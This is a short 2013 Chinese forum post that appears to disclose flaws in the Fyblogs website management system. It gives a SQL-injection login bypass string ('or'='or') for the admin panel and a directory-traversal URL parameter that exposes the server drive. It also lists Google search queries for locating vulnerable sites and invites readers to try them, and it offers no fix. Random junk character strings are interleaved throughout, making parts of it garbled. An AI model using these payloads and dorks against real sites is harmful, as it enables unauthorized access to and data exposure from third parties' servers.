漏洞类型: 未授权访问/权限绕过
! c' Q% @+ _* u- y# Q1 B8 S) d3 P2 @( ~+ f" K$ R1 Z, @
简要描述:
6 v6 H* j u3 i! }: G
3 y0 h1 i& G4 Y) d6 ~' N& J! mFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!2 ` G( B3 L/ m; G$ f( V
3 f; @! ?& N. u: e% T详细说明:9 k* y# @, E, h% C
* H5 S# e$ `) P) i, z9 T后台万能密码 'or'='or'' A6 H6 N* C9 S; @ p7 p
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
& p8 ~& w7 ^: `6 Padmin/uploadfile.asp?currentFolder=/upfiles/../
3 s& J. u0 ^# s8 `: j/ K7 S3 x
- c0 z. Y# u$ Q% [/ A漏洞证明:/ R+ u9 w+ d% ~4 e4 _
' {) g% w. e3 p- H+ E4 {
谷歌:inurl:type.asp?id=1 新闻中心
5 [9 |' ~1 {2 V( }或者 :inurl:download_ok.asp?
+ S! L* p' M8 E# L: W" k6 N
% S z0 {: v( c, A i8 `9 f可以测试
2 |0 P' \9 ?& s4 ?) ]% y: n; \5 ?, _
3 c: ^, X( b% {
|
发表于 2013-3-7 13:07:46
收藏
支持
反对